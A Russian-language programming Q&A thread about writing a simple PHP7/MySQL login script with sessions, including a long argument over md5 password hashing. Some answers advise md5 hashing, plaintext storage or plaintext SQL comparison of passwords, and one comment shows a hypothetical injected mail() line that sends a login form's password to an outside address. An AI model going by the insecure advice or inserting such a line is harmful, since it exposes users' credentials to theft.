Где найти простой скрипт авторизации PHP7+MySQL+SESSION+COOKIES?

Question

[doexec]

Всем привет.
Весь интернет перерыл в поисках простейшей авторизации на PHP7 и MySQL с сессиями и куками - либо старьё одно под 5.6, то авторы лишних библиотек напихают.

Может у кого на личном блоге есть урок/пример? Или в проекте недавно писали?
Спасибо.

Comments

[edward_freedom]

на гитхаб зайди и выбирай на любой вкус. Проще самому написать и ничего не искать, раз такой привередливый

[doexec]

edward_freedom, жаль комментарий отметить ответом нельзя. В итоге написал сам.

[FanatPHP]

Ну так сам и напиши ответ, покажи что написал

Answer 1

[doexec]

Написал сам.

Comments

[Александр Торопов]

поделись)

Answer 2

[Immortal_pony]

https://github.com/auraphp/Aura.Auth

Answer 3

[Владимир Коротенко]

1. считать супермассив пост и сравнить поля username и password со значениями в БД (пароль шифровать md5)
2. запустить сессию и поставить куку
3. по желанию перенаправить пользователя дальше.

Comments

[Immortal_pony]

Серия "вредные советы"?

[Владимир Коротенко]

Immortal_pony, Чем плоха кука с токеном? Если мы конечно говорим про https и сессионную куку?

[FanatPHP]

для начала можно почитать чем плох мд5

[Владимир Коротенко]

FanatPHP, И таки вы просветите надеюсь. Кроме заявки о высокой скорости работы я ничего не вижу.

ПС если у вас своруют дамп базы, вас уже хэши будут мало волновать

[FanatPHP]

Да ты я смотрю иксперт.

[Владимир Коротенко]

FanatPHP, У вас проблемы с самооценкой или брякнули и не можете обосновать свое мнение?
Итак чем плох MD5 конкретно в PHP в данном случае?

[FanatPHP]

Тоже, кстати, показатель - если в дескрипшене пишет про себя "синьор", то в ответах обязательно детский лепет и прочие ужасы нашего городка.

[Владимир Коротенко]

FanatPHP, Положим вы самоутвердились. Но ответ будет по поводу MD5?

[FanatPHP]

Дружочек, ну кого ты лечишь?
Ты ведь не для того спрашиваешь, чтобы узнать что-то новое и уйти отсюда, пообещав, что никогда больше не будешь писать ересь про мд5 для паролей.
Ты пишешь для того чтобы всем доказать, какой ты умный и нетривиально мыслящий.
Ну и назови хоть одну причину, по которой я должен тратить свое время, пересказывая очевидные вещи очередному нубу с завышенным чсв?

[Владимир Коротенко]

FanatPHP, Я чесал свое ЧСВ, вместо ссылки на документацию?

Так что не так с MD5?

Полноте господин всезнайка. Вам 4 раз задают этот вопрос, и вы почему то юлите вместо указания на мануал.
Где написано:

Не используйте данную функцию, в данный момент она устарела и легко вычисляется в качестве альтернативы мы рекомендуем .....

[FanatPHP]

Ну ты определись уже наконец. или "я весь из себя такой синьор помидор" или "дяденька, научи Гуглом пользоваться, а то я запрос из трёх слов сам сочинить не могу"

[Владимир Коротенко]

То есть по вашему криптостойкость алгоритма аргументируются следующим образом:

Ну ты определись уже наконец. или "я весь из себя такой синьор помидор" или "дяденька, научи Гуглом пользоваться, а то я запрос из трёх слов сам сочинить не могу"

Дружочек, ну кого ты лечишь?

оже, кстати, показатель - если в дескрипшене пишет про себя "синьор", то в ответах обязательно детский лепет и прочие ужасы нашего городка.

Да ты я смотрю иксперт.

[FanatPHP]

Ну наконец-то, хоть какое-то разнообразие в этой высокоинтеллектуальной дискуссии.

Я так понимаю, что ты уже сам нагуглил все что нужно и продолжаешь больше для блезиру. Так что можно на этом и завершить

[Владимир Коротенко]

FanatPHP, Да это называется соскочить с темы.

[FanatPHP]

То есть ты хочешь сказать, что для тебя тема пользования гуглом не не раскрыта? Ты хорошо подумал? :)

[Владимир Коротенко]

Я написал ровно то что хотел написать, что там вам говорят ваши голоса, о том что я якобы думаю вы спрашивайте у них.

Так все же будет ответ? Чем плохи md5 пароли в защищенной системе?

[FanatPHP]

Молодец, решил вернуться к своему неумному троллингу. А я уже почти даже поверил что ты честно хотел узнать ссылку на мунаул, где написан ответ на твой вопрос, но просто не осилил нагуглить :)

[xfg]

Владимир Коротенко, то есть для вас вычислительная сложность алгоритма не имеет значения? Отличная забота о пользователях. Знать бы им, что компрометация ваших md5 паролей может привести к угону не только аккаунта на вашем сервисе, но и на других обычным перебором по различным словарям и сравнением полученных результатов с результатами в базе данных из-за своей очень низкой вычислительной сложности.

[Alex Wells]

Владимир Коротенко, может вам расказать, обьяснить и аргументировать почему не стоит юзать глобалы? Чем плоха статика? Зачем корень веб-сервера выводить куда-то отдельно?

Еще какие-то общеизвестные, легко гуглящиеся вещи порасказывать? Вы же синиор, и без гугла должны знать, но зачем-то просите кого-то АРГУМЕНТИРОВАТЬ чем плохо хранить пароли в md5? Серьезно?

Вы либо дикий тролль, либо херовенький синиор.

[poniyur]

FanatPHP, спс, из-за вашего "диалога" с Владимиром погуглил и узнал кое-что новое

[Araik]

Я тут оставлю ссылку, так, на всякий случай))
https://www.php.net/manual/en/function.password-ha...

[Владимир Коротенко]

Alex Wells, Глобалы по старой памяти, лучше все-же $_POST
Насчет md5 я действительно серьезно спросил. Проводя аналогию из жизни:
Вам в квартиру уже выломали дверь, разыскали все заначки, выносят все вещи, но вы гордитесь тем что ваша записная книжка не будет расшифрована, точнее ключи от той двери которую уже выломали.

Итак логика?
Я собственно и хотел услышать это мнение, или корректный ответ. Вместо этого, вижу непомерное эго и неумение обосновать свою позицию. Ведь достаточно было одной ссылки на официальную документацию, где изложены эти все соображения. Но человек предпочел почесать свое эго.

ПС если уж говорить о реальных системах, которые начинают писать с нуля, то логично использовать новые функции, да и защищать не только записную книжку, а и все вокруг.

[Владимир Коротенко]

Видел, правда к моему вопросу больше подходит ссылка из FAQ
NinjaNickName, https://www.php.net/manual/en/faq.passwords.php#fa...

[Владимир Коротенко]

xfg,

то есть для вас вычислительная сложность алгоритма не имеет значения? Отличная забота о пользователях. Знать бы им, что компрометация ваших md5 паролей может привести к угону не только аккаунта на вашем сервисе, но и на других обычным перебором по различным словарям и сравнением полученных результатов с результатами в базе данных из-за своей очень низкой вычислительной сложности.

Чуть выше привел аналогию, но немного разверну.
1. Ценность паролей переоценена
2. Безопасно должно быть все приложение
3. Зачем вообще хранить пароль? Oauth еще не завезли?
4. 2 факторная аутентификация?
5. Или может быть вообще беспарольная схема?
6. Мы храним пароли в суперзащищенном формате, попытка прикрыть задницу, когда уже все случилось

[Владимир Коротенко]

FanatPHP, Причем тут тролинг? Пойдешь на SO там тебе расскажут и покажут как нужно делать.
Придешь сюда, тебя попытаются унизить, самоутвердиться за твой счет, прокричат кучу фраз не по делу.

Как по мне это плохая тенденция, добрее нужно быть, и жизнь в стране станет лучше. Peace dude

[FanatPHP]

Владимир Коротенко, если ты придешь сюда и спросишь, без подковырок, чем плох мд5 и чем его заменить, тебе кинут ссылку и может быть пожурят за лень.
Если ты придешь на стаковерфлой и спросишь так же как здесь,"ну-ну, умники, ну расскажите мне чем так плох мд5, а я вам раскажу какие вы тупые, что уперлись в хэширование", то тебе точно так же насуют минусов полную панамку.
Так что дело не в бобине...

[xfg]

Владимир Коротенко, откуда вы знаете, что у пользователя есть аккаунты на тех сервисах, которые вы решили использовать в качестве oauth провайдера. Почему вы считаете, что пользователь должен хотеть шарить данные с этих сервисов с вами, особенно на запись. Почему вы предлагаете усложнить UX двухфакторной аутентификацией там, где это не требуется. Почему вообще нужно тратить кучу времени на это всё, когда требуется просто вход по паролю.

Пользуясь вашей аналогией нужно вообще тогда пароли в открытом виде хранить. Но вы почему-то хотите именно md5, который ни туда ни сюда. Зачем вам вообще какое-либо хеширование? Всё равно же всё уже украли исходя из вашей логики.

[Владимир Коротенко]

xfg, Не агритесь так, по идее даже хранить пароли в открытом виде не такая плохая идея. Кроме того есть статистика что более 90% пользователей зарегистрированы в facebook, google, twitter, wechat.

И собственно главный если у вас увели дамп, то алгоритм шифрования уже как мертвому припарки. Пароль можно узнать в гугле, в его сервисе проверки скомпрометированных учеток.

Так что система должна быть комплексной, о чем я и говорю.

ПС даже если человек вставит тупым копипастом мой код, нормальная система выдаст предупреждение, со ссылкой чем заменить. Во всяком случае PHPStorm так вроде бы делает. Поправьте меня если не так

[Владимир Коротенко]

FanatPHP, Вы первый полезли в бутылку, я вас выставил идиотом. Извини ничего личного, но сдерживай эмоции.

[xfg]

Владимир Коротенко, пруфа на статистику нет, но даже если итак, то наверное все 90% спят и видят как бы подарить свои данные какому-нибудь сервису. Наверное очень сильно хотят получать уведомления о различных промо акциях на свой емайл.

Альтернатива всегда должна быть. Помоему это очевидно.

[FanatPHP]

Владимир Коротенко, молодец, возьми с полки пирожок. Когда обтечёшь :)

[Владимир Коротенко]

xfg, Им просто безразлично. Впрочем для гиков можно сделать кнопку логин через одноразовую почту.
Но что то я такой кнопки не видел. А всякие сервисы просят от меня все, вплоть до моего телефона.

[iAdil]

Владимир Коротенко, вы очень сложный человек, думаю с вами сложно работать в команде.
Вам один раз сказали, что использовать md5 это не хорошо, но вы уперлись, твердите что защита должна быть комплексной, и в то же время советуете использовать md5 для шифрования.

[Владимир Коротенко]

iAdil, Я не 100 баксов, не должен всем нравится. Если вам не понятна моя позиция спрашивайте.
Итак злоумышленник уже имеет доступ к дампу базы, предположительно к файловой системе, возможно он добавил в форму доступа код

mail("Sending@provider.com", "Testing", $password, $headers);

И все что вас волнует это мертвая лошадь md5 ?

[Alex Wells]

Владимир Коротенко,

Итак логика?

Очень простая. Вы - синиор. Вы и так за кучу лет опыта сталкивались с десяток раз с этой темой. Даже если за 5+ лет вы ни разу ничего не слышали об хэшировании паролей md5, то эта тема гуглится элементарно, вместе со всеми доводами против этого.

Вместо этого вы решили настоять на том, что бы кто-то вам разжевал это. Как я уже сказал, вы либо дикий тролль, либо не синиор (даже если вы так себя называете).

[Alex Wells]

Владимир Коротенко, и отвечу как юзер на счет oauth:

Главный вопрос - зачем.

Что бы я каждый раз вспоминал, какой из "соц. сетей" я заходил на их сайт в последний раз? А потом на сайте добавят соц. авторизацию и мне прийдется пароль ресетить, что бы вспомнить, логинился я через соц. сети или через пароль?У меня есть менеджер паролей - пусть этим занимается он, а не я.

А если я захожу с приватной вкладки? С другого девайса? Заходить в гугл с двухфакторкой что бы в кино билет заказать, серьезно?

При каждой авторизации следить за доступами, которые требует сайт? А что если сайт действительно ломанули, и они в одну строчку добавили туда oauth скоуп, отвечающий за перманентный полный доступ к аккаунту, а я авторизовался как в любой другой день и не заметил?

Не вижу ни одной причины использовать авторизацию через соц. сети. Зато вижу кучу причин этого не делать.

Answer 4

[FanatPHP]

Простой скрипт авторизации MySQL+SESSION на 7 ничем не отличается от 5.6
Со времен 5.6 в этой области вообще ничего не изменилось.

Так что если скрипт действительно на 5.6 то можно смело брать и пользоваться.
Другое дело, что в онлайн туториалах обычно суют код от РНР 4, как например в видео из ответа ниже.
Надо мне конечно самому заняться, но когда еще руки доайдут

Если говорить про совсемпростейший вариант, и нарисовать хтмл форму ты можешь самостоятельно, то вот так

<?php
if (empty($_POST['email']) || empty($_POST['pass'])) {
    die ("Enter credentials");
}
require 'pdo.php';
$stmt = $pdo->prepare("SELECT * FROM users WHERE email = ?");
$stmt->execute([$_POST['email']]);
$user = $stmt->fetch();

if ($user && password_verify($_POST['pass'], $user['pass']))
{
    session_start();
    $_SESSION['user'] = $user;
    header("Location: /dashboard.php");
    exit;
} else {
    die ("Wrong credentials");
}

Answer 5

[ThunderCat]

Весь интернет перерыл в поисках простейшей авторизации на PHP7 и MySQL с сессиями и куками

Ну, для начала, писать "скрипт" на 7 пыхе - явно изврат, ибо как то уже совсем уныло писать на лапшекоде и без архитектуры, ибо нормально это должно быть что-то типа:

class UserController extend BaseController 
{
....
public function loginAction(){
    $user = $this->currentUser();
    $user->login($this->params->post('login'),$this->params->post('pass'));
    if($user->isLoggedIn()){
        redirect($someURL);
    }
    else{
         doErrorStuff();
    }
}
}

Answer 6

[profesor08]

Где-то в начале index.php написать session_start();

Где-то в другом месте, где должен находиться скрип авторизации, написать функцию, которая будет вызываться в index.php, примерное содержание функции:

function Auth()
  {
    $user = Util::alphaNum(Request::post("user"));
    $password = Util::alphaNum(Request::post("password"));

    $sql = Server::connect();

    $user = $sql->fetchOne("SELECT id FROM user WHERE user = :user AND password = :password", [
      "user" => $user,
      "password" => $password,
    ]);

    if (is_null($user)) {
      throw new \UserAuthWrongLoginException();
    }

    $_SESSION["user"] = $user->id;
  }